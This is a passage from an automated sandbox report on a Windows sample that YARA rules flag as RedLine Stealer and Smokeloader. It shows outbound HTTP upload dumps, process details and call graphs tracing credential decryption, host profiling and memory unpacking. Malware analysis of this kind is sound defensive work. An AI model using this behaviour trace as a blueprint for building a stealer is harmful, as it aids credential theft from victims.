                                                    2024-04-26 03:44:07 UTC15331OUTData Raw: d7 3d 94 c3 89 71 d6 d4 ae 21 75 a6 23 b6 90 a8 37 b4 72 8f c0 fe 67 35 63 7a fc 6a 99 cb 64 32 29 96 6c 2a 92 ee df d0 2b 9f 64 00 c8 26 18 79 c5 29 ce 15 e5 e9 c0 f3 b9 1d 92 a2 87 d4 d1 33 8e fd 05 94 ee 5a de eb 43 46 74 72 20 47 62 f3 f9 de 6e 15 63 55 42 4a 63 a6 b2 33 92 b8 e7 41 94 f0 66 d8 0b 62 77 2d 7f 62 f4 71 07 52 87 34 84 2d 79 e9 71 00 e1 85 5f c2 14 e4 62 60 70 95 8a 90 5c 6d fc f1 e6 26 ff 11 88 ae 3e ce 6c 0d d3 eb aa 38 ce ab 45 01 e1 ad 6b cc 11 30 86 eb 16 04 1d 2b 8f ea 7e 30 46 9b fb 25 84 f1 35 cb b2 b4 82 dd 77 83 40 dd f9 f1 24 0e b4 9d 77 37 6d d0 3d d5 d9 18 dc b9 92 8f e5 30 55 ea 14 75 48 25 43 f7 63 05 d2 51 e8 ec d6 ff f2 c4 9f 68 78 84 fc ff 20 b3 b3 a0 df 1c a5 44 02 46 6c e6 a5 69 21 18 07 2d ec 73 a9 de 97 86 d1 f5 cb
                                                    Data Ascii: =q!u#7rg5czjd2)l*+d&y)3ZCFtr GbncUBJc3Afbw-bqR4-yq_b`p\m&>l8Ek0+~0F%5w@$w7m=0UuH%CcQhx DFli!-s
                                                    2024-04-26 03:44:07 UTC15331OUTData Raw: 9a 30 f7 82 93 72 5a 35 fa db 4a fe 1e c2 49 f0 98 5d e4 2a 77 13 49 a1 90 99 64 98 22 c8 0b cf 4f c9 77 cb 68 d4 24 82 7c 51 fc ef 2b e2 a7 55 d0 e0 83 d1 13 5f ca de 88 ad 82 dc 11 21 2b 31 f2 6a 80 63 ad ba 52 bb c9 19 36 db 0d a4 e7 5e ad 77 d7 91 eb 6a b3 d5 79 76 c0 b6 9b 40 cd 42 50 e4 e8 67 19 18 8d 2a 99 2e b0 48 ec ef 48 20 65 6d 95 65 4c 65 55 00 6f d5 2b 59 1b 8c fe 3b 78 61 e9 a3 24 a9 0d 41 71 51 40 b0 bc 65 61 6a 4c b0 11 17 b9 32 a4 fb 29 fa 65 83 fb e9 62 6f 28 db dd 47 4b c1 07 a6 7b 12 66 e4 8b 05 a1 7b 43 a4 30 07 cf 3f 6d ad 30 89 87 88 33 5e 0d 84 d1 a5 57 95 d1 7b 08 c6 4d ad e5 48 45 28 ae c9 c1 0d 56 bb eb 62 b8 84 5d 1a 5b 1b 8a 30 ad 0f b0 8e 10 5e 5c 50 89 89 ec 52 c9 0b ab e7 88 96 64 59 9a 63 01 2d 64 b6 c2 4e c2 a2 af fb c8
                                                    Data Ascii: 0rZ5JI]*wId"Owh$|Q+U_!+1jcR6^wjyv@BPg*.HH emeLeUo+Y;xa$AqQ@eajL2)ebo(GK{f{C0?m03^W{MHE(Vb][0^\PRdYc-dN
                                                    2024-04-26 03:44:09 UTC818INHTTP/1.1 200 OK
                                                    Date: Fri, 26 Apr 2024 03:44:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=7rhh2gagc81ks20eel39vogq0d; expires=Mon, 19-Aug-2024 21:30:48 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w3YOLxzWRXE9oIv6quGqw91nIQoZpcGeSB4PiZg7Q%2B8TOdjgxbGhS8GwTwNQe%2BwmQ2DNGQLgV6JncvV%2F9o5CLxL%2FleWTy2%2F6nKPWxPoCNr%2FA4db5Zy17Q59J2imLUY%2B6%2FXghwv6UWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87a3928ffa90a570-MIA
                                                    alt-svc: h3=":443"; ma=86400


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:05:43:55
                                                    Start date:26/04/2024
                                                    Path:C:\Users\user\Desktop\VoGtelkHSn.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\VoGtelkHSn.exe"
                                                    Imagebase:0x400000
                                                    File size:351'232 bytes
                                                    MD5 hash:7F26737F63FCD5B7E2695F438E341075
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:05:44:08
                                                    Start date:26/04/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5444 -s 1612
                                                    Imagebase:0x380000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:8.4%
                                                      Dynamic/Decrypted Code Coverage:8.4%
                                                      Signature Coverage:24.3%
                                                      Total number of Nodes:382
                                                      Total number of Limit Nodes:17
                                                      execution_graph 19593 414bc0 19602 433b50 19593->19602 19595 414bcd 19605 439000 19595->19605 19598 433b50 RtlAllocateHeap 19599 414bed 19598->19599 19600 439000 LdrInitializeThunk 19599->19600 19601 414bff 19600->19601 19603 433ba6 19602->19603 19604 433be4 RtlAllocateHeap 19602->19604 19603->19604 19604->19595 19607 43904d 19605->19607 19606 414bdd 19606->19598 19608 4390ae 19607->19608 19611 433cc0 19607->19611 19608->19606 19610 433cc0 LdrInitializeThunk 19608->19610 19610->19606 19612 433ced LdrInitializeThunk 19611->19612 19613 433cf0 19611->19613 19612->19608 19613->19608 19619 414c49 19620 414c4f 19619->19620 19621 433cc0 LdrInitializeThunk 19620->19621 19622 415981 19621->19622 19623 414848 19625 41484e 19623->19625 19624 41490e 19625->19624 19626 433cc0 LdrInitializeThunk 19625->19626 19627 414936 19626->19627 19628 4357ca 19629 435810 19628->19629 19629->19629 19630 43586e 19629->19630 19631 433cc0 LdrInitializeThunk 19629->19631 19632 433cc0 LdrInitializeThunk 19630->19632 19631->19630 19632->19630 19633 41bf4a 19634 41bf4f 19633->19634 19637 438ba0 19634->19637 19636 41bfd6 19638 438bc0 19637->19638 19639 433b50 RtlAllocateHeap 19638->19639 19640 438be0 19639->19640 19641 438d0e 19640->19641 19642 433cc0 LdrInitializeThunk 19640->19642 19641->19636 19642->19641 19643 4375cd 19644 43760b 19643->19644 19645 43764a RtlReAllocateHeap 19643->19645 19644->19645 19646 437724 19645->19646 19647 414d51 19648 414d57 19647->19648 19649 433b50 RtlAllocateHeap 19648->19649 19650 414e72 19649->19650 19650->19650 19651 438ba0 2 API calls 19650->19651 19652 414eed 19651->19652 19653 42f4d3 19654 42f501 19653->19654 19655 433b50 RtlAllocateHeap 19654->19655 19656 42f5b1 19655->19656 19657 431dd5 19660 438070 19657->19660 19659 431e03 GetVolumeInformationW 19667 4255d8 19668 425632 19667->19668 19668->19668 19669 42576e 19668->19669 19670 433cc0 LdrInitializeThunk 19668->19670 19670->19669 19676 417160 19679 432010 19676->19679 19678 41716d 19680 438ba0 2 API calls 19679->19680 19681 43203d 19680->19681 19683 432244 19681->19683 19684 433b50 RtlAllocateHeap 19681->19684 19686 432390 19681->19686 19687 43211e 19681->19687 19683->19686 19690 433cc0 LdrInitializeThunk 19683->19690 19689 432066 19684->19689 19686->19678 19687->19683 19687->19686 19692 434160 19687->19692 19696 434010 19687->19696 19700 434250 19687->19700 19689->19687 19691 433cc0 LdrInitializeThunk 19689->19691 19690->19683 19691->19687 19693 43421e 19692->19693 19694 434176 19692->19694 19693->19687 19694->19693 19695 433cc0 LdrInitializeThunk 19694->19695 19695->19693 19697 434027 19696->19697 19698 43412e 19696->19698 19697->19698 19699 433cc0 LdrInitializeThunk 19697->19699 19698->19687 19699->19698 19701 434458 19700->19701 19702 43426b 19700->19702 19701->19687 19702->19701 19702->19702 19705 433cc0 LdrInitializeThunk 19702->19705 19706 43432e 19702->19706 19703 43442e 19703->19701 19704 434160 LdrInitializeThunk 19703->19704 19704->19701 19705->19706 19706->19703 19707 433cc0 LdrInitializeThunk 19706->19707 19707->19703 19708 4359e2 19710 435a3c 19708->19710 19709 435a9e 19710->19709 19711 433cc0 LdrInitializeThunk 19710->19711 19711->19709 19712 418a66 19713 418a7b 19712->19713 19714 433b50 RtlAllocateHeap 19713->19714 19715 418c08 19714->19715 19716 438ba0 2 API calls 19715->19716 19717 418c6e 19716->19717 19718 4309e9 19719 4309ee 19718->19719 19720 433b50 RtlAllocateHeap 19719->19720 19721 4309fc 19720->19721 19722 439000 LdrInitializeThunk 19721->19722 19723 430a26 19722->19723 19724 41e5ec 19725 41e5fc 19724->19725 19728 439500 19725->19728 19727 41e618 19731 43954d 19728->19731 19729 4395ae 19730 433b50 RtlAllocateHeap 19729->19730 19734 43969e 19729->19734 19733 4395eb 19730->19733 19731->19729 19732 433cc0 LdrInitializeThunk 19731->19732 19732->19729 19733->19734 19735 433cc0 LdrInitializeThunk 19733->19735 19734->19727 19735->19734 19736 41e670 19739 4393a0 19736->19739 19741 4393c0 19739->19741 19740 41e685 19741->19740 19742 433cc0 LdrInitializeThunk 19741->19742 19742->19740 19743 41a0f0 19744 41a140 19743->19744 19745 41a0fe 19743->19745 19746 433b50 RtlAllocateHeap 19745->19746 19747 41a154 19746->19747 19747->19747 19749 41a200 19747->19749 19750 41a280 19749->19750 19750->19750 19751 433b50 RtlAllocateHeap 19750->19751 19752 41a300 19751->19752 19752->19752 19755 438d50 19752->19755 19754 41a371 19756 438d70 19755->19756 19757 433b50 RtlAllocateHeap 19756->19757 19758 438d90 19757->19758 19759 438ebe 19758->19759 19760 433cc0 LdrInitializeThunk 19758->19760 19759->19754 19760->19759 19761 4139fc 19766 4097d0 19761->19766 19763 413a09 19764 4097d0 2 API calls 19763->19764 19765 413a1d 19764->19765 19767 4097e5 19766->19767 19771 409821 19766->19771 19772 431cd0 19767->19772 19769 409895 19770 433b50 RtlAllocateHeap 19769->19770 19770->19771 19771->19763 19773 431d82 RtlExpandEnvironmentStrings 19772->19773 19774 431d41 19772->19774 19774->19773 19775 408c80 19777 408c8a 19775->19777 19776 408cf2 ExitProcess 19778 408caa GetStdHandle 19777->19778 19779 408c9d 19777->19779 19778->19779 19779->19776 19780 41c900 19781 41c90b 19780->19781 19785 41c95f 19780->19785 19782 433b50 RtlAllocateHeap 19781->19782 19783 41c96e 19782->19783 19784 433b50 RtlAllocateHeap 19783->19784 19784->19785 19786 424087 19787 424091 19786->19787 19787->19787 19788 4244fe GetComputerNameExA 19787->19788 19790 42456d 19788->19790 19789 4245fb GetComputerNameExA 19791 42467b 19789->19791 19790->19789 19790->19790 19792 427f84 19793 428066 SysAllocString 19792->19793 19794 42801a 19792->19794 19795 4280cd 19793->19795 19794->19793 19796 415087 19798 415090 19796->19798 19797 41516e 19798->19797 19799 433cc0 LdrInitializeThunk 19798->19799 19799->19797 19800 413c09 19801 413c15 19800->19801 19802 4097d0 2 API calls 19801->19802 19803 413c23 19802->19803 19804 42d608 19805 42d60d 19804->19805 19806 42d6a4 KiUserCallbackDispatcher GetSystemMetrics 19805->19806 19807 436209 19808 43627c LoadLibraryW 19807->19808 19810 424f8f 19811 424f96 19810->19811 19812 431cd0 RtlExpandEnvironmentStrings 19811->19812 19813 42506a 19812->19813 19814 4250b5 GetPhysicallyInstalledSystemMemory 19813->19814 19815 4250da 19814->19815 19815->19815 19816 415890 19817 438d50 2 API calls 19816->19817 19818 415897 19817->19818 19819 438d50 2 API calls 19818->19819 19820 4158a1 19819->19820 19821 41c390 19822 41c395 19821->19822 19826 41fe80 19822->19826 19830 41c540 19822->19830 19823 41c3bf 19827 41fe99 19826->19827 19829 420000 19826->19829 19828 433b50 RtlAllocateHeap 19827->19828 19828->19829 19829->19823 19831 41c556 19830->19831 19836 41c610 19830->19836 19832 433b50 RtlAllocateHeap 19831->19832 19831->19836 19833 41c682 19832->19833 19833->19833 19834 438ba0 2 API calls 19833->19834 19835 41c6fd 19834->19835 19835->19836 19837 433b50 RtlAllocateHeap 19835->19837 19836->19823 19838 41c70d 19837->19838 19839 439000 LdrInitializeThunk 19838->19839 19840 41c71f 19839->19840 19841 433b50 RtlAllocateHeap 19840->19841 19842 41c765 19840->19842 19843 41c77a 19841->19843 19842->19836 19844 433cc0 LdrInitializeThunk 19842->19844 19843->19843 19846 408d90 19843->19846 19844->19836 19847 408eb6 19846->19847 19849 408db0 19846->19849 19848 433b50 RtlAllocateHeap 19847->19848 19851 408dfa 19848->19851 19850 433b50 RtlAllocateHeap 19849->19850 19850->19851 19851->19842 19852 433d10 19853 433d6c 19852->19853 19854 433cc0 LdrInitializeThunk 19853->19854 19855 433dce 19853->19855 19854->19855 19856 433cc0 LdrInitializeThunk 19855->19856 19857 433f4e 19855->19857 19856->19857 19858 431690 19859 438ba0 2 API calls 19858->19859 19860 4316c0 19859->19860 19865 415999 19866 4159a8 19865->19866 19867 433b50 RtlAllocateHeap 19866->19867 19869 415ad6 19867->19869 19868 415ce9 CryptUnprotectData 19869->19868 19870 435f1f 19872 435f2a 19870->19872 19871 436000 LoadLibraryW 19873 436007 19871->19873 19872->19871 19874 411d1c 19875 411d2b 19874->19875 19880 414950 19875->19880 19877 411d3e 19878 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 19877->19878 19879 411d48 19878->19879 19881 414970 19880->19881 19881->19881 19882 41497a RtlExpandEnvironmentStrings 19881->19882 19883 4149ae 19882->19883 19884 433b50 RtlAllocateHeap 19883->19884 19885 4149be RtlExpandEnvironmentStrings 19884->19885 19886 414a4e 19885->19886 19887 433b50 RtlAllocateHeap 19886->19887 19888 414ad7 19887->19888 19888->19888 19889 438ba0 2 API calls 19888->19889 19890 414b5a 19889->19890 19891 4106a0 19892 4106af 19891->19892 19897 417810 19892->19897 19894 4106c0 19895 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 19894->19895 19896 4106ca 19895->19896 19898 417830 19897->19898 19898->19898 19899 41783b RtlExpandEnvironmentStrings 19898->19899 19900 41785c 19899->19900 19901 433b50 RtlAllocateHeap 19900->19901 19902 41786b RtlExpandEnvironmentStrings 19901->19902 19903 438d50 2 API calls 19902->19903 19904 41788f 19903->19904 19905 4146a3 19906 433b50 RtlAllocateHeap 19905->19906 19907 4146ad 19906->19907 19908 439000 LdrInitializeThunk 19907->19908 19909 4146bf 19908->19909 19910 4162a2 19913 417280 19910->19913 19914 417340 19913->19914 19915 433b50 RtlAllocateHeap 19914->19915 19916 41743e 19915->19916 19917 433b50 RtlAllocateHeap 19916->19917 19918 41764c 19917->19918 19919 41f3a4 19920 4393a0 LdrInitializeThunk 19919->19920 19921 41f3c7 19920->19921 19922 2bf79d3 19925 2bf79de 19922->19925 19926 2bf79ed 19925->19926 19929 2bf817e 19926->19929 19930 2bf8199 19929->19930 19931 2bf81a2 CreateToolhelp32Snapshot 19930->19931 19932 2bf81be Module32First 19930->19932 19931->19930 19931->19932 19933 2bf81cd 19932->19933 19934 2bf79dd 19932->19934 19936 2bf7e3d 19933->19936 19937 2bf7e68 19936->19937 19938 2bf7e79 VirtualAlloc 19937->19938 19939 2bf7eb1 19937->19939 19938->19939 19939->19939 19940 2eb0005 19945 2eb092b GetPEB 19940->19945 19942 2eb0030 19947 2eb003c 19942->19947 19946 2eb0972 19945->19946 19946->19942 19948 2eb0049 19947->19948 19962 2eb0e0f SetErrorMode SetErrorMode 19948->19962 19953 2eb0265 19954 2eb02ce VirtualProtect 19953->19954 19956 2eb030b 19954->19956 19955 2eb0439 VirtualFree 19960 2eb05f4 LoadLibraryA 19955->19960 19961 2eb04be 19955->19961 19956->19955 19957 2eb04e3 LoadLibraryA 19957->19961 19959 2eb08c7 19960->19959 19961->19957 19961->19960 19963 2eb0223 19962->19963 19964 2eb0d90 19963->19964 19965 2eb0dad 19964->19965 19966 2eb0dbb GetPEB 19965->19966 19967 2eb0238 VirtualAlloc 19965->19967 19966->19967 19967->19953 19968 4145b2 19969 4145c0 19968->19969 19970 438ba0 2 API calls 19969->19970 19971 4145fd 19970->19971 19972 41e434 19973 41e437 19972->19973 19974 41e3d0 19972->19974 19975 4393a0 LdrInitializeThunk 19974->19975 19976 41e416 19975->19976 19977 4204b7 19982 4204e9 19977->19982 19978 4207b5 19983 42089e 19978->19983 19988 433cc0 LdrInitializeThunk 19978->19988 19979 439500 RtlAllocateHeap LdrInitializeThunk 19979->19982 19980 4393a0 LdrInitializeThunk 19980->19982 19982->19978 19982->19979 19982->19980 19982->19983 19984 420510 19982->19984 19989 420997 19982->19989 19990 439e50 19982->19990 19986 433cc0 LdrInitializeThunk 19983->19986 19985 4205d2 19984->19985 19987 433cc0 LdrInitializeThunk 19984->19987 19986->19989 19987->19985 19988->19983 19992 439e70 19990->19992 19991 439f3e 19993 433b50 RtlAllocateHeap 19991->19993 19996 43a032 19991->19996 19992->19991 19994 433cc0 LdrInitializeThunk 19992->19994 19995 439f7d 19993->19995 19994->19991 19995->19996 19997 433cc0 LdrInitializeThunk 19995->19997 19996->19982 19997->19996 19998 413a3b 19999 413a4a 19998->19999 20024 41d690 19999->20024 20001 413a50 20002 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20001->20002 20003 413a5a 20002->20003 20004 41df50 6 API calls 20003->20004 20005 413a6c 20004->20005 20006 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20005->20006 20007 413a76 20006->20007 20008 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20007->20008 20009 413a95 20008->20009 20010 420220 LdrInitializeThunk 20009->20010 20011 413aaa 20010->20011 20012 420ca0 RtlAllocateHeap LdrInitializeThunk 20011->20012 20013 413ab3 20012->20013 20014 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20013->20014 20015 413ac6 20014->20015 20016 421eb0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap 20015->20016 20017 413adb 20016->20017 20018 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20017->20018 20019 413ae5 20018->20019 20020 423410 RtlAllocateHeap 20019->20020 20021 413afa 20020->20021 20022 42c500 6 API calls 20021->20022 20023 413b03 20022->20023 20025 41d710 20024->20025 20026 41d746 RtlExpandEnvironmentStrings 20024->20026 20025->20025 20025->20026 20027 41d78b 20026->20027 20028 433b50 RtlAllocateHeap 20027->20028 20029 41d79b RtlExpandEnvironmentStrings 20028->20029 20030 41d829 20029->20030 20031 433b50 RtlAllocateHeap 20030->20031 20033 41d8c6 20031->20033 20032 438d50 2 API calls 20034 41d937 20032->20034 20033->20032 20033->20033

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 73 41d1c1-41d1c9 74 41d1d0-41d1f8 73->74 75 41d360 73->75 76 41d380 73->76 77 41d390-41d392 73->77 78 41d3a0 73->78 79 41d382-41d389 73->79 80 41d352-41d357 73->80 81 41d362-41d36a 73->81 82 41d236-41d248 73->82 83 41d3a6-41d3b5 73->83 84 41d20b-41d22f 73->84 85 41d1ff-41d204 73->85 74->75 74->76 74->77 74->78 74->79 74->80 74->81 74->82 74->83 74->84 74->85 87 41d3c0-41d3d2 74->87 88 41d4a7 74->88 89 41d409 74->89 92 41d46b-41d49e 74->92 93 41d42e-41d43c 74->93 94 41d5d0 74->94 95 41d410-41d415 74->95 96 41d450 74->96 97 41d4b0-41d503 74->97 103 41d3d9-41d402 74->103 104 41d459-41d464 74->104 107 41d41e-41d426 74->107 76->79 112 41d675 77->112 78->83 79->77 79->78 79->83 86 41d681-41d70e 79->86 79->87 79->88 79->89 90 41d629-41d635 79->90 91 41d5e9-41d5fe 79->91 79->92 79->93 79->94 79->95 79->96 79->97 98 41d610-41d622 79->98 99 41d650-41d656 79->99 100 41d670 79->100 101 41d672 79->101 102 41d5d6-41d5e2 79->102 79->103 79->104 105 41d658-41d66f 79->105 106 41d63c-41d647 79->106 79->107 80->75 81->74 81->75 81->76 81->77 81->78 81->79 81->80 81->81 81->82 81->83 81->84 81->85 81->86 81->87 81->88 81->89 81->90 81->91 81->92 81->93 81->94 81->95 81->96 81->97 81->98 81->99 81->100 81->101 81->102 81->103 81->104 81->105 81->106 81->107 108 41d110 81->108 109 41d250-41d2a6 81->109 110 41d371 81->110 111 41d1b2 81->111 82->75 82->76 82->77 82->78 82->79 82->80 82->81 82->83 82->87 82->88 82->89 82->92 82->93 82->94 82->95 82->96 82->97 82->103 82->104 82->107 82->109 83->86 83->87 83->88 83->89 83->90 83->91 83->92 83->93 83->94 83->95 83->96 83->97 83->98 83->99 83->100 83->101 83->102 83->103 83->104 83->105 83->106 83->107 84->74 84->75 84->76 84->77 84->78 84->79 84->80 84->81 84->82 84->83 84->85 84->87 84->88 84->89 84->92 84->93 84->94 84->95 84->96 84->97 84->103 84->104 84->107 85->74 85->75 85->76 85->77 85->78 85->79 85->80 85->81 85->83 85->84 85->87 85->88 85->89 85->92 85->93 85->94 85->95 85->96 85->97 85->103 85->104 85->107 125 41d710-41d744 86->125 126 41d746-41d789 RtlExpandEnvironmentStrings 86->126 87->86 87->87 87->88 87->89 87->90 87->91 87->92 87->93 87->94 87->95 87->96 87->97 87->98 87->99 87->100 87->101 87->102 87->103 87->104 87->105 87->106 87->107 88->97 89->95 90->99 90->100 90->101 90->105 90->106 91->90 91->98 91->99 91->100 91->101 91->105 91->106 92->88 93->86 93->87 93->88 93->90 93->91 93->92 93->94 93->96 93->97 93->98 93->99 93->100 93->101 93->102 93->105 93->106 95->107 96->104 118 41d505 97->118 119 41d547-41d54f 97->119 98->90 98->99 98->100 98->101 98->105 98->106 99->101 101->112 102->90 102->91 102->98 102->99 102->100 102->101 102->105 102->106 103->86 103->87 103->88 103->89 103->90 103->91 103->92 103->93 103->94 103->95 103->96 103->97 103->98 103->99 103->100 103->101 103->102 103->104 103->105 103->106 103->107 104->86 104->87 104->88 104->90 104->91 104->92 104->94 104->97 104->98 104->99 104->100 104->101 104->102 104->105 104->106 105->100 106->99 107->93 108->111 115 41d2e6-41d2f1 109->115 116 41d2a8 109->116 110->76 111->73 112->86 123 41d340-41d34b 115->123 124 41d2f3-41d2ff 115->124 122 41d2b0-41d2e4 116->122 127 41d510-41d545 118->127 119->87 128 41d555-41d561 119->128 122->115 122->122 123->75 123->76 123->77 123->78 123->79 123->80 123->81 123->83 123->86 123->87 123->88 123->89 123->90 123->91 123->92 123->93 123->94 123->95 123->96 123->97 123->98 123->99 123->100 123->101 123->102 123->103 123->104 123->105 123->106 123->107 130 41d300-41d307 124->130 125->125 125->126 131 41d792 126->131 132 41d78b-41d790 126->132 127->119 127->127 133 41d570-41d577 128->133 135 41d310-41d316 130->135 136 41d309-41d30c 130->136 134 41d795-41d827 call 433b50 RtlExpandEnvironmentStrings 131->134 132->134 137 41d583-41d589 133->137 138 41d579-41d57c 133->138 147 41d879-41d8af 134->147 148 41d829 134->148 135->123 141 41d318-41d334 call 433cc0 135->141 136->130 139 41d30e 136->139 137->87 143 41d58f-41d5be call 433cc0 137->143 138->133 142 41d57e 138->142 139->123 141->123 142->87 143->86 143->87 143->88 143->89 143->90 143->91 143->92 143->93 143->94 143->95 143->96 143->97 143->98 143->99 143->100 143->101 143->102 143->103 143->104 143->105 143->106 143->107 152 41d8b1-41d8b6 147->152 153 41d8b8-41d8bd 147->153 151 41d830-41d877 148->151 151->147 151->151 154 41d8c0-41d8d1 call 433b50 152->154 153->154 157 41d8f1-41d901 154->157 158 41d8d3-41d8d8 154->158 160 41d921-41d932 call 438d50 157->160 161 41d903-41d90a 157->161 159 41d8e0-41d8ef 158->159 159->157 159->159 164 41d937-41d954 160->164 163 41d910-41d91f 161->163 163->160 163->163
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -^$AV$SE$X&$onqp$onqp$onqp$onqp
                                                      • API String ID: 0-3369686749
                                                      • Opcode ID: 2aa403f95998474b279076b6215ed3361f740d88d0d070a12ae0e0386af4dd00
                                                      • Instruction ID: f2e5acc6d9acbb0f66739c54945ec629fa02afe6258683cb3efe77a6dba95094
                                                      • Opcode Fuzzy Hash: 2aa403f95998474b279076b6215ed3361f740d88d0d070a12ae0e0386af4dd00
                                                      • Instruction Fuzzy Hash: 1012AA79608342CBE318CF14D86076BB7E2FFCA314F158A2DE4959B290D778D945CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 334 423943-424276 336 424281-424323 call 438070 334->336 337 424278-42427e call 408700 334->337 343 424325 336->343 344 424378-424381 336->344 337->336 345 424330-424376 343->345 346 424383-424389 344->346 347 42439b-4243a7 344->347 345->344 345->345 348 424390-424399 346->348 349 4243bb-4243e9 call 408770 call 438070 347->349 350 4243a9-4243af 347->350 348->347 348->348 355 4243ee-4243f8 349->355 352 4243b0-4243b9 350->352 352->349 352->352 356 4243fb-42445d 355->356 357 4244a8-4244b1 356->357 358 42445f 356->358 360 4244b3-4244b9 357->360 361 4244cb-4244d7 357->361 359 424460-4244a6 358->359 359->357 359->359 362 4244c0-4244c9 360->362 363 4244eb-4244f9 call 438070 361->363 364 4244d9-4244df 361->364 362->361 362->362 367 4244fe-42456b GetComputerNameExA 363->367 365 4244e0-4244e9 364->365 365->363 365->365 368 4245b2-4245bb 367->368 369 42456d-42456f 367->369 371 4245db-4245e7 368->371 372 4245bd-4245c3 368->372 370 424570-4245b0 369->370 370->368 370->370 374 4245fb-424679 GetComputerNameExA 371->374 375 4245e9-4245ef 371->375 373 4245d0-4245d9 372->373 373->371 373->373 377 4246d2-4246db 374->377 378 42467b 374->378 376 4245f0-4245f9 375->376 376->374 376->376 380 4246fb-424707 377->380 381 4246dd-4246e3 377->381 379 424680-4246d0 378->379 379->377 379->379 382 42471b-424780 380->382 383 424709-42470f 380->383 384 4246f0-4246f9 381->384 387 424782 382->387 388 4247c0-4247c9 382->388 385 424710-424719 383->385 384->380 384->384 385->382 385->385 389 424790-4247be 387->389 390 4247eb-4247f7 388->390 391 4247cb-4247d1 388->391 389->388 389->389 393 42480b-42488a call 438070 390->393 394 4247f9-4247ff 390->394 392 4247e0-4247e9 391->392 392->390 392->392 399 4248e9-4248f2 393->399 400 42488c-42488f 393->400 395 424800-424809 394->395 395->393 395->395 402 4248f4-424902 399->402 403 42491d-42491f 399->403 401 424890-4248e7 400->401 401->399 401->401 404 424910-424919 402->404 405 424925-424933 403->405 404->404 406 42491b 404->406 407 424958-424961 405->407 406->405 408 424a01-424a04 407->408 409 424967-42496d 407->409 410 424a0a-424a50 408->410 411 424940-424942 409->411 412 42496f-424999 409->412 414 424a52 410->414 415 424aa5-424ab0 410->415 413 424947-424952 411->413 416 4249c0-4249ce 412->416 417 42499b-42499e 412->417 413->407 419 424a06-424a08 413->419 420 424a60-424aa3 414->420 422 424ab2-424ab8 415->422 423 424acb-424ace call 429680 415->423 416->413 418 4249d4-4249fc 416->418 417->416 421 4249a0-4249be 417->421 418->413 419->410 420->415 420->420 421->413 424 424ac0-424ac9 422->424 426 424ad3-424aef 423->426 424->423 424->424
                                                      APIs
                                                      • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
                                                      • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424618
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID: +u7$Z8J*
                                                      • API String ID: 3545744682-3577212644
                                                      • Opcode ID: e5e2bda020c127f40aa795968d0effa3993ca4e991fe1260367e154c84f4a601
                                                      • Instruction ID: 165055785b86ff1ff65636ea23ef9f62a0f191231776936cceeb048ae6667778
                                                      • Opcode Fuzzy Hash: e5e2bda020c127f40aa795968d0effa3993ca4e991fe1260367e154c84f4a601
                                                      • Instruction Fuzzy Hash: 10328E70244B528AD729CB34D464BE3BBE1EF57308F484A6DD0FB8B682D778A406CB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
